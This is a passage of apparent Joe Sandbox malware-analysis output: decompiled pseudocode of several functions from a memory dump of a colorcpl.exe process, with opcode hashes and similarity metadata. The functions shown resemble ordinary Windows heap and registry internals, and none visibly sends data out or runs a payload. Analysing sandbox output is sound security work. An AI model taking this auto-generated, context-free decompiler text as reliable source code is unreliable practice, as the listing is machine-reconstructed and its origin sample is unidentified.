                                                                                                						goto L4;
                                                                                                					}
                                                                                                					_t72 =  *0x6f07b9c; // 0x0
                                                                                                					_t74 = L06E34620(_t107, _t107, _t72 + 0x180000, _t121);
                                                                                                					_v1064 = _t74;
                                                                                                					__eflags = _t74;
                                                                                                					if(_t74 == 0) {
                                                                                                						goto L60;
                                                                                                					}
                                                                                                					_t102 = _t74;
                                                                                                					_push( &_v1060);
                                                                                                					_push(_t121);
                                                                                                					_push(_t74);
                                                                                                					_push(2);
                                                                                                					_push( &_v1048);
                                                                                                					_push(_t116);
                                                                                                					_t122 = E06E59650();
                                                                                                					__eflags = _t122;
                                                                                                					if(_t122 >= 0) {
                                                                                                						L7:
                                                                                                						_t114 = _a12;
                                                                                                						__eflags = _t114;
                                                                                                						if(_t114 != 0) {
                                                                                                							_t77 = _a20;
                                                                                                							L26:
                                                                                                							_t109 =  *(_t102 + 4);
                                                                                                							__eflags = _t109 - 3;
                                                                                                							if(_t109 == 3) {
                                                                                                								L55:
                                                                                                								__eflags = _t114 - _t109;
                                                                                                								if(_t114 != _t109) {
                                                                                                									L59:
                                                                                                									_t122 = 0xc0000024;
                                                                                                									L15:
                                                                                                									_t78 = _v1052;
                                                                                                									__eflags = _t78;
                                                                                                									if(_t78 != 0) {
                                                                                                										L06E377F0( *( *[fs:0x30] + 0x18), 0, _t78);
                                                                                                									}
                                                                                                									_t68 = _t122;
                                                                                                									goto L4;
                                                                                                								}
                                                                                                								_t110 = _v1056;
                                                                                                								_t118 =  *((intOrPtr*)(_t102 + 8));
                                                                                                								_v1060 = _t118;
                                                                                                								__eflags = _t110;
                                                                                                								if(_t110 == 0) {
                                                                                                									L10:
                                                                                                									_t122 = 0x80000005;
                                                                                                									L11:
                                                                                                									_t81 = _v1040;
                                                                                                									__eflags = _t81;
                                                                                                									if(_t81 == 0) {
                                                                                                										goto L15;
                                                                                                									}
                                                                                                									__eflags = _t122;
                                                                                                									if(_t122 >= 0) {
                                                                                                										L14:
                                                                                                										 *_t81 = _t118;
                                                                                                										goto L15;
                                                                                                									}
                                                                                                									__eflags = _t122 - 0x80000005;
                                                                                                									if(_t122 != 0x80000005) {
                                                                                                										goto L15;
                                                                                                									}
                                                                                                									goto L14;
                                                                                                								}
                                                                                                								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
                                                                                                								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
                                                                                                									goto L10;
                                                                                                								}
                                                                                                								_push( *((intOrPtr*)(_t102 + 8)));
                                                                                                								_t59 = _t102 + 0xc; // 0xc
                                                                                                								_push(_t110);
                                                                                                								L54:
                                                                                                								E06E5F3E0();
                                                                                                								_t125 = _t125 + 0xc;
                                                                                                								goto L11;
                                                                                                							}
                                                                                                							__eflags = _t109 - 7;
                                                                                                							if(_t109 == 7) {
                                                                                                								goto L55;
                                                                                                							}
                                                                                                							_t118 = 4;
                                                                                                							__eflags = _t109 - _t118;
                                                                                                							if(_t109 != _t118) {
                                                                                                								__eflags = _t109 - 0xb;
                                                                                                								if(_t109 != 0xb) {
                                                                                                									__eflags = _t109 - 1;
                                                                                                									if(_t109 == 1) {
                                                                                                										__eflags = _t114 - _t118;
                                                                                                										if(_t114 != _t118) {
                                                                                                											_t118 =  *((intOrPtr*)(_t102 + 8));
                                                                                                											_v1060 = _t118;
                                                                                                											__eflags = _t118 - _t77;
                                                                                                											if(_t118 > _t77) {
                                                                                                												goto L10;
                                                                                                											}
                                                                                                											_push(_t118);
                                                                                                											_t56 = _t102 + 0xc; // 0xc
                                                                                                											_push(_v1056);
                                                                                                											goto L54;
                                                                                                										}
                                                                                                										__eflags = _t77 - _t118;
                                                                                                										if(_t77 != _t118) {
                                                                                                											L34:
                                                                                                											_t122 = 0xc0000004;
                                                                                                											goto L15;
                                                                                                										}
                                                                                                										_t111 = _v1056;
                                                                                                										__eflags = _t111 & 0x00000003;
                                                                                                										if((_t111 & 0x00000003) == 0) {
                                                                                                											_v1060 = _t118;
                                                                                                											__eflags = _t111;
                                                                                                											if(__eflags == 0) {
                                                                                                												goto L10;
                                                                                                											}
                                                                                                											_t42 = _t102 + 0xc; // 0xc
                                                                                                											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
                                                                                                											_v1048 =  *((intOrPtr*)(_t102 + 8));
                                                                                                											_push(_t111);
                                                                                                											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
                                                                                                											_push(0);
                                                                                                											_push( &_v1048);
                                                                                                											_t122 = E06E513C0(_t102, _t118, _t122, __eflags);
                                                                                                											L44:
                                                                                                											_t118 = _v1072;
                                                                                                											goto L11;
                                                                                                										}
                                                                                                										_t122 = 0x80000002;
                                                                                                										goto L15;
                                                                                                									}
                                                                                                									_t122 = 0xc0000024;
                                                                                                									goto L44;
                                                                                                								}
                                                                                                								__eflags = _t114 - _t109;
                                                                                                								if(_t114 != _t109) {
                                                                                                									goto L59;
                                                                                                								}
                                                                                                								_t118 = 8;
                                                                                                								__eflags = _t77 - _t118;
                                                                                                								if(_t77 != _t118) {
                                                                                                									goto L34;
                                                                                                								}
                                                                                                								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                                                                                								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                                                                                									goto L34;
                                                                                                								}
                                                                                                								_t112 = _v1056;
                                                                                                								_v1060 = _t118;
                                                                                                								__eflags = _t112;
                                                                                                								if(_t112 == 0) {
                                                                                                									goto L10;
                                                                                                								}
                                                                                                								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
                                                                                                								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
                                                                                                								goto L11;
                                                                                                							}
                                                                                                							__eflags = _t114 - _t118;
                                                                                                							if(_t114 != _t118) {
                                                                                                								goto L59;
                                                                                                							}
                                                                                                							__eflags = _t77 - _t118;
                                                                                                							if(_t77 != _t118) {
                                                                                                								goto L34;
                                                                                                							}
                                                                                                							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                                                                                							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                                                                                								goto L34;
                                                                                                							}
                                                                                                							_t113 = _v1056;
                                                                                                							_v1060 = _t118;
                                                                                                							__eflags = _t113;
                                                                                                							if(_t113 == 0) {
                                                                                                								goto L10;
                                                                                                							}
                                                                                                							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
                                                                                                							goto L11;
                                                                                                						}
                                                                                                						_t118 =  *((intOrPtr*)(_t102 + 8));
                                                                                                						__eflags = _t118 - _a20;
                                                                                                						if(_t118 <= _a20) {
                                                                                                							_t114 =  *(_t102 + 4);
                                                                                                							_t77 = _t118;
                                                                                                							goto L26;
                                                                                                						}
                                                                                                						_v1060 = _t118;
                                                                                                						goto L10;
                                                                                                					}
                                                                                                					__eflags = _t122 - 0x80000005;
                                                                                                					if(_t122 != 0x80000005) {
                                                                                                						goto L15;
                                                                                                					}
                                                                                                					L06E377F0( *( *[fs:0x30] + 0x18), 0, _t102);
                                                                                                					L18:
                                                                                                					_t121 = _v1060;
                                                                                                					goto L19;
                                                                                                				}
                                                                                                				_push( &_v1060);
                                                                                                				_push(0x400);
                                                                                                				_t102 =  &_v1036;
                                                                                                				_push(_t102);
                                                                                                				_push(2);
                                                                                                				_push( &_v1048);
                                                                                                				_push(_t116);
                                                                                                				_t122 = E06E59650();
                                                                                                				if(_t122 >= 0) {
                                                                                                					__eflags = 0;
                                                                                                					_v1052 = 0;
                                                                                                					goto L7;
                                                                                                				}
                                                                                                				if(_t122 == 0x80000005) {
                                                                                                					goto L18;
                                                                                                				}
                                                                                                				goto L4;
                                                                                                			}

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f90fbf3126d58fa18f5951964ee87e57b0eae9724ad58b43bb857f9cc63b58c4
                                                                                                • Instruction ID: ecdc3aa1b3840df248cee666f3c34e64b9f206937bd5243677e428b747e8b857
                                                                                                • Opcode Fuzzy Hash: f90fbf3126d58fa18f5951964ee87e57b0eae9724ad58b43bb857f9cc63b58c4
                                                                                                • Instruction Fuzzy Hash: 0E81B472A147018FDF95EE14C880A7E73EAEB84294F25585AED5D9B244D330ED40CBE2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 85%
                                                                                                			E06E4138B(signed int __ecx, signed int* __edx, intOrPtr _a4, signed int _a12, signed int _a16, char _a20, intOrPtr _a24) {
                                                                                                				void* _v8;
                                                                                                				signed int _v12;
                                                                                                				signed int _v16;
                                                                                                				signed int _v20;
                                                                                                				signed int _v24;
                                                                                                				signed int _v28;
                                                                                                				void* __ebx;
                                                                                                				signed int _t97;
                                                                                                				signed int _t102;
                                                                                                				void* _t105;
                                                                                                				char* _t112;
                                                                                                				signed int _t113;
                                                                                                				signed int _t117;
                                                                                                				signed int _t119;
                                                                                                				signed int* _t122;
                                                                                                				signed int _t124;
                                                                                                				signed int _t130;
                                                                                                				signed int _t136;
                                                                                                				char _t150;
                                                                                                				intOrPtr _t153;
                                                                                                				signed int _t161;
                                                                                                				signed int _t163;
                                                                                                				signed int _t170;
                                                                                                				signed int _t175;
                                                                                                				signed int _t176;
                                                                                                				signed int _t182;
                                                                                                				signed int* _t183;
                                                                                                				signed int* _t184;
                                                                                                
                                                                                                				_t182 = __ecx;
                                                                                                				_t153 = _a24;
                                                                                                				_t183 = __edx;
                                                                                                				_v24 =  *((intOrPtr*)( *[fs:0x30] + 0x68));
                                                                                                				_t97 = _t153 - _a16;
                                                                                                				if(_t97 > 0xfffff000) {
                                                                                                					L19:
                                                                                                					return 0;
                                                                                                				}
                                                                                                				asm("cdq");
                                                                                                				_t150 = _a20;
                                                                                                				_v16 = _t97 / 0x1000;
                                                                                                				_t102 = _a4 + 0x00000007 & 0xfffffff8;
                                                                                                				_t170 = _t102 + __edx;
                                                                                                				_v20 = _t102 >> 0x00000003 & 0x0000ffff;
                                                                                                				_t105 = _t170 + 0x28;
                                                                                                				_v12 = _t170;
                                                                                                				if(_t105 >= _t150) {
                                                                                                					if(_t105 >= _t153) {
                                                                                                						goto L19;
                                                                                                					}
                                                                                                					_v8 = _t170 - _t150 + 8;
                                                                                                					_push(E06E40678(__ecx, 1));
                                                                                                					_push(0x1000);
                                                                                                					_push( &_v8);
                                                                                                					_push(0);
                                                                                                					_push( &_a20);
                                                                                                					_push(0xffffffff);
                                                                                                					if(E06E59660() < 0) {
                                                                                                						 *((intOrPtr*)(_t182 + 0x214)) =  *((intOrPtr*)(_t182 + 0x214)) + 1;
                                                                                                						goto L19;
                                                                                                					}
                                                                                                					if(E06E37D50() == 0) {
                                                                                                						_t112 = 0x7ffe0380;
                                                                                                					} else {
                                                                                                						_t112 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                					}
                                                                                                					if( *_t112 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                                                						E06ED138A(_t150, _t182, _a20, _v8, 3);
                                                                                                					}
                                                                                                					_t150 = _a20 + _v8;
                                                                                                					_t153 = _a24;
                                                                                                					_a20 = _t150;
                                                                                                				}
                                                                                                				_t183[0] = 1;
                                                                                                				_t113 = _t153 - _t150;
                                                                                                				_t183[1] = 1;
                                                                                                				asm("cdq");
                                                                                                				_t175 = _t113 % 0x1000;
                                                                                                				_v28 = _t113 / 0x1000;
                                                                                                				 *_t183 = _v20;
                                                                                                				_t183[1] =  *(_t182 + 0x54);
                                                                                                				if((_v24 & 0x00001000) != 0) {
                                                                                                					_t117 = E06E416C7(1, _t175);
                                                                                                					_t150 = _a20;
                                                                                                					_t183[0xd] = _t117;
                                                                                                				}
                                                                                                				_t183[0xb] = _t183[0xb] & 0x00000000;
                                                                                                				_t176 = _v12;
                                                                                                				_t183[3] = _a12;
                                                                                                				_t119 = _a16;
                                                                                                				_t183[7] = _t119;
                                                                                                				_t161 = _v16 << 0xc;
                                                                                                				_t183[6] = _t182;
                                                                                                				_t183[0xa] = _t119 + _t161;
                                                                                                				_t183[8] = _v16;
                                                                                                				_t122 =  &(_t183[0xe]);
                                                                                                				_t183[2] = 0xffeeffee;
                                                                                                				_t183[9] = _t176;
                                                                                                				 *((intOrPtr*)(_t182 + 0x1e8)) =  *((intOrPtr*)(_t182 + 0x1e8)) + _t161;
                                                                                                				 *((intOrPtr*)(_t182 + 0x1e4)) =  *((intOrPtr*)(_t182 + 0x1e4)) + _t161;
                                                                                                				_t122[1] = _t122;
                                                                                                				 *_t122 = _t122;
                                                                                                				if(_t183[6] != _t183) {
                                                                                                					_t124 = 1;
                                                                                                				} else {
                                                                                                					_t124 = 0;
                                                                                                				}
                                                                                                				_t183[1] = _t124;
                                                                                                				 *(_t176 + 4) =  *_t183 ^  *(_t182 + 0x54);
                                                                                                				if(_t183[6] != _t183) {
                                                                                                					_t130 = (_t176 - _t183 >> 0x10) + 1;
                                                                                                					_v24 = _t130;
                                                                                                					if(_t130 >= 0xfe) {
                                                                                                						_push(_t161);
                                                                                                						_push(0);
                                                                                                						E06EDA80D(_t183[6], 3, _t176, _t183);
                                                                                                						_t150 = _a20;
                                                                                                						_t176 = _v12;
                                                                                                						_t130 = _v24;
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t130 = 0;
                                                                                                				}
                                                                                                				 *(_t176 + 6) = _t130;
                                                                                                				E06E3B73D(_t182, _t183, _t150 - 0x18, _v28 << 0xc, _t176,  &_v8);
                                                                                                				if( *((intOrPtr*)(_t182 + 0x4c)) != 0) {
                                                                                                					_t183[0] = _t183[0] ^  *_t183 ^ _t183[0];
                                                                                                					 *_t183 =  *_t183 ^  *(_t182 + 0x50);
                                                                                                				}
                                                                                                				if(_v8 != 0) {
                                                                                                					E06E3A830(_t182, _v12, _v8);
                                                                                                				}
                                                                                                				_t136 = _t182 + 0xa4;
                                                                                                				_t184 =  &(_t183[4]);
                                                                                                				_t163 =  *(_t136 + 4);
                                                                                                				if( *_t163 != _t136) {
                                                                                                					_push(_t163);
                                                                                                					_push( *_t163);
                                                                                                					E06EDA80D(0, 0xd, _t136, 0);
                                                                                                				} else {
                                                                                                					 *_t184 = _t136;
                                                                                                					_t184[1] = _t163;
                                                                                                					 *_t163 = _t184;
                                                                                                					 *(_t136 + 4) = _t184;
                                                                                                				}
                                                                                                				 *((intOrPtr*)(_t182 + 0x1f4)) =  *((intOrPtr*)(_t182 + 0x1f4)) + 1;
                                                                                                				return 1;
                                                                                                			}

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • Opcode ID: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
                                                                                                • Instruction ID: 4c78acc6a8449e3f4376a77ce443607038f2e8f97e4755d5039b81fbf190189e
                                                                                                • Opcode Fuzzy Hash: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
                                                                                                • Instruction Fuzzy Hash: A1819C75A003459FCBA4DF68C844BEABBF5FF48344F109569E85AC7651D730EA81CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 79%
                                                                                                			E06E96DC9(signed int __ecx, void* __edx) {
                                                                                                				unsigned int _v8;
                                                                                                				intOrPtr _v12;
                                                                                                				signed int _v16;
                                                                                                				intOrPtr _v20;
                                                                                                				intOrPtr _v24;
                                                                                                				intOrPtr _v28;
                                                                                                				char _v32;
                                                                                                				char _v36;
                                                                                                				char _v40;
                                                                                                				char _v44;
                                                                                                				char _v48;
                                                                                                				char _v52;
                                                                                                				char _v56;
                                                                                                				char _v60;
                                                                                                				void* _t87;
                                                                                                				void* _t95;
                                                                                                				signed char* _t96;
                                                                                                				signed int _t107;
                                                                                                				signed int _t136;
                                                                                                				signed char* _t137;
                                                                                                				void* _t157;
                                                                                                				void* _t161;
                                                                                                				void* _t167;
                                                                                                				intOrPtr _t168;
                                                                                                				void* _t174;
                                                                                                				void* _t175;
                                                                                                				signed int _t176;
                                                                                                				void* _t177;
                                                                                                
                                                                                                				_t136 = __ecx;
                                                                                                				_v44 = 0;
                                                                                                				_t167 = __edx;
                                                                                                				_v40 = 0;
                                                                                                				_v36 = 0;
                                                                                                				_v32 = 0;
                                                                                                				_v60 = 0;
                                                                                                				_v56 = 0;
                                                                                                				_v52 = 0;
                                                                                                				_v48 = 0;
                                                                                                				_v16 = __ecx;
                                                                                                				_t87 = L06E34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
                                                                                                				_t175 = _t87;
                                                                                                				if(_t175 != 0) {
                                                                                                					_t11 = _t175 + 0x30; // 0x30
                                                                                                					 *((short*)(_t175 + 6)) = 0x14d4;
                                                                                                					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
                                                                                                					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
                                                                                                					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
                                                                                                					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
                                                                                                					E06E96B4C(_t167, _t11, 0x214,  &_v8);
                                                                                                					_v12 = _v8 + 0x10;
                                                                                                					_t95 = E06E37D50();
                                                                                                					_t137 = 0x7ffe0384;
                                                                                                					if(_t95 == 0) {
                                                                                                						_t96 = 0x7ffe0384;
                                                                                                					} else {
                                                                                                						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                					}
                                                                                                					_push(_t175);
                                                                                                					_push(_v12);
                                                                                                					_push(0x402);
                                                                                                					_push( *_t96 & 0x000000ff);
                                                                                                					E06E59AE0();
                                                                                                					_t87 = L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
                                                                                                					_t176 = _v16;
                                                                                                					if((_t176 & 0x00000100) != 0) {
                                                                                                						_push( &_v36);
                                                                                                						_t157 = 4;
                                                                                                						_t87 = E06E9795D( *((intOrPtr*)(_t167 + 8)), _t157);
                                                                                                						if(_t87 >= 0) {
                                                                                                							_v24 = E06E9795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
                                                                                                							_v28 = E06E9795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
                                                                                                							_push( &_v52);
                                                                                                							_t161 = 5;
                                                                                                							_t168 = E06E9795D( *((intOrPtr*)(_t167 + 8)), _t161);
                                                                                                							_v20 = _t168;
                                                                                                							_t107 = L06E34620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
                                                                                                							_v16 = _t107;
                                                                                                							if(_t107 != 0) {
                                                                                                								_v8 = _v8 & 0x00000000;
                                                                                                								 *(_t107 + 0x20) = _t176;
                                                                                                								 *((short*)(_t107 + 6)) = 0x14d5;
                                                                                                								_t47 = _t107 + 0x24; // 0x24
                                                                                                								_t177 = _t47;
                                                                                                								E06E96B4C( &_v36, _t177, 0xc78,  &_v8);
                                                                                                								_t51 = _v8 + 4; // 0x4
                                                                                                								_t178 = _t177 + (_v8 >> 1) * 2;
                                                                                                								_v12 = _t51;
                                                                                                								E06E96B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                                                                                								_v12 = _v12 + _v8;
                                                                                                								E06E96B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                                                                                								_t125 = _v8;
                                                                                                								_v12 = _v12 + _v8;
                                                                                                								E06E96B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
                                                                                                								_t174 = _v12 + _v8;
                                                                                                								if(E06E37D50() != 0) {
                                                                                                									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                								}
                                                                                                								_push(_v16);
                                                                                                								_push(_t174);
                                                                                                								_push(0x402);
                                                                                                								_push( *_t137 & 0x000000ff);
                                                                                                								E06E59AE0();
                                                                                                								L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
                                                                                                								_t168 = _v20;
                                                                                                							}
                                                                                                							_t87 = L06E32400( &_v36);
                                                                                                							if(_v24 >= 0) {
                                                                                                								_t87 = L06E32400( &_v44);
                                                                                                							}
                                                                                                							if(_t168 >= 0) {
                                                                                                								_t87 = L06E32400( &_v52);
                                                                                                							}
                                                                                                							if(_v28 >= 0) {
                                                                                                								return L06E32400( &_v60);
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				return _t87;
                                                                                                			}


                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                                • Instruction ID: 48fcd0032af07dddc40e4cf0bb64d97cbc0096ed4730dd1ec5ffa8233359fd9a
                                                                                                • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                                • Instruction Fuzzy Hash: 3C717E71E10319EFDF90DFA4C984AEEBBB9FF48714F105069E514A7250EB30AA45CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 39%
                                                                                                			E06EAB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                                                                                                				char _v8;
                                                                                                				signed int _v12;
                                                                                                				signed int _t80;
                                                                                                				signed int _t83;
                                                                                                				intOrPtr _t89;
                                                                                                				signed int _t92;
                                                                                                				signed char _t106;
                                                                                                				signed int* _t107;
                                                                                                				intOrPtr _t108;
                                                                                                				intOrPtr _t109;
                                                                                                				signed int _t114;
                                                                                                				void* _t115;
                                                                                                				void* _t117;
                                                                                                				void* _t119;
                                                                                                				void* _t122;
                                                                                                				signed int _t123;
                                                                                                				signed int* _t124;
                                                                                                
                                                                                                				_t106 = _a12;
                                                                                                				if((_t106 & 0xfffffffc) != 0) {
                                                                                                					return 0xc000000d;
                                                                                                				}
                                                                                                				if((_t106 & 0x00000002) != 0) {
                                                                                                					_t106 = _t106 | 0x00000001;
                                                                                                				}
                                                                                                				_t109 =  *0x6f07b9c; // 0x0
                                                                                                				_t124 = L06E34620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                                                                                                				if(_t124 != 0) {
                                                                                                					 *_t124 =  *_t124 & 0x00000000;
                                                                                                					_t124[1] = _t124[1] & 0x00000000;
                                                                                                					_t124[4] = _t124[4] & 0x00000000;
                                                                                                					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                                                                                                						L13:
                                                                                                						_push(_t124);
                                                                                                						if((_t106 & 0x00000002) != 0) {
                                                                                                							_push(0x200);
                                                                                                							_push(0x28);
                                                                                                							_push(0xffffffff);
                                                                                                							_t122 = E06E59800();
                                                                                                							if(_t122 < 0) {
                                                                                                								L33:
                                                                                                								if((_t124[4] & 0x00000001) != 0) {
                                                                                                									_push(4);
                                                                                                									_t64 =  &(_t124[1]); // 0x4
                                                                                                									_t107 = _t64;
                                                                                                									_push(_t107);
                                                                                                									_push(5);
                                                                                                									_push(0xfffffffe);
                                                                                                									E06E595B0();
                                                                                                									if( *_t107 != 0) {
                                                                                                										_push( *_t107);
                                                                                                										E06E595D0();
                                                                                                									}
                                                                                                								}
                                                                                                								_push(_t124);
                                                                                                								_push(0);
                                                                                                								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                                                                                								L37:
                                                                                                								L06E377F0();
                                                                                                								return _t122;
                                                                                                							}
                                                                                                							_t124[4] = _t124[4] | 0x00000002;
                                                                                                							L18:
                                                                                                							_t108 = _a8;
                                                                                                							_t29 =  &(_t124[0x105]); // 0x414
                                                                                                							_t80 = _t29;
                                                                                                							_t30 =  &(_t124[5]); // 0x14
                                                                                                							_t124[3] = _t80;
                                                                                                							_t123 = 0;
                                                                                                							_t124[2] = _t30;
                                                                                                							 *_t80 = _t108;
                                                                                                							if(_t108 == 0) {
                                                                                                								L21:
                                                                                                								_t112 = 0x400;
                                                                                                								_push( &_v8);
                                                                                                								_v8 = 0x400;
                                                                                                								_push(_t124[2]);
                                                                                                								_push(0x400);
                                                                                                								_push(_t124[3]);
                                                                                                								_push(0);
                                                                                                								_push( *_t124);
                                                                                                								_t122 = E06E59910();
                                                                                                								if(_t122 != 0xc0000023) {
                                                                                                									L26:
                                                                                                									if(_t122 != 0x106) {
                                                                                                										L40:
                                                                                                										if(_t122 < 0) {
                                                                                                											L29:
                                                                                                											_t83 = _t124[2];
                                                                                                											if(_t83 != 0) {
                                                                                                												_t59 =  &(_t124[5]); // 0x14
                                                                                                												if(_t83 != _t59) {
                                                                                                													L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                                                                                                												}
                                                                                                											}
                                                                                                											_push( *_t124);
                                                                                                											E06E595D0();
                                                                                                											goto L33;
                                                                                                										}
                                                                                                										 *_a16 = _t124;
                                                                                                										return 0;
                                                                                                									}
                                                                                                									if(_t108 != 1) {
                                                                                                										_t122 = 0;
                                                                                                										goto L40;
                                                                                                									}
                                                                                                									_t122 = 0xc0000061;
                                                                                                									goto L29;
                                                                                                								} else {
                                                                                                									goto L22;
                                                                                                								}
                                                                                                								while(1) {
                                                                                                									L22:
                                                                                                									_t89 =  *0x6f07b9c; // 0x0
                                                                                                									_t92 = L06E34620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                                                                                                									_t124[2] = _t92;
                                                                                                									if(_t92 == 0) {
                                                                                                										break;
                                                                                                									}
                                                                                                									_t112 =  &_v8;
                                                                                                									_push( &_v8);
                                                                                                									_push(_t92);
                                                                                                									_push(_v8);
                                                                                                									_push(_t124[3]);
                                                                                                									_push(0);
                                                                                                									_push( *_t124);
                                                                                                									_t122 = E06E59910();
                                                                                                									if(_t122 != 0xc0000023) {
                                                                                                										goto L26;
                                                                                                									}
                                                                                                									L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                                                                                                								}
                                                                                                								_t122 = 0xc0000017;
                                                                                                								goto L26;
                                                                                                							}
                                                                                                							_t119 = 0;
                                                                                                							do {
                                                                                                								_t114 = _t124[3];
                                                                                                								_t119 = _t119 + 0xc;
                                                                                                								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                                                                                                								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                                                                                                								_t123 = _t123 + 1;
                                                                                                								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                                                                                                							} while (_t123 < _t108);
                                                                                                							goto L21;
                                                                                                						}
                                                                                                						_push(0x28);
                                                                                                						_push(3);
                                                                                                						_t122 = E06E1A7B0();
                                                                                                						if(_t122 < 0) {
                                                                                                							goto L33;
                                                                                                						}
                                                                                                						_t124[4] = _t124[4] | 0x00000001;
                                                                                                						goto L18;
                                                                                                					}
                                                                                                					if((_t106 & 0x00000001) == 0) {
                                                                                                						_t115 = 0x28;
                                                                                                						_t122 = E06EAE7D3(_t115, _t124);
                                                                                                						if(_t122 < 0) {
                                                                                                							L9:
                                                                                                							_push(_t124);
                                                                                                							_push(0);
                                                                                                							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                                                                                							goto L37;
                                                                                                						}
                                                                                                						L12:
                                                                                                						if( *_t124 != 0) {
                                                                                                							goto L18;
                                                                                                						}
                                                                                                						goto L13;
                                                                                                					}
                                                                                                					_t15 =  &(_t124[1]); // 0x4
                                                                                                					_t117 = 4;
                                                                                                					_t122 = E06EAE7D3(_t117, _t15);
                                                                                                					if(_t122 >= 0) {
                                                                                                						_t124[4] = _t124[4] | 0x00000001;
                                                                                                						_v12 = _v12 & 0x00000000;
                                                                                                						_push(4);
                                                                                                						_push( &_v12);
                                                                                                						_push(5);
                                                                                                						_push(0xfffffffe);
                                                                                                						E06E595B0();
                                                                                                						goto L12;
                                                                                                					}
                                                                                                					goto L9;
                                                                                                				} else {
                                                                                                					return 0xc0000017;
                                                                                                				}
                                                                                                			}




















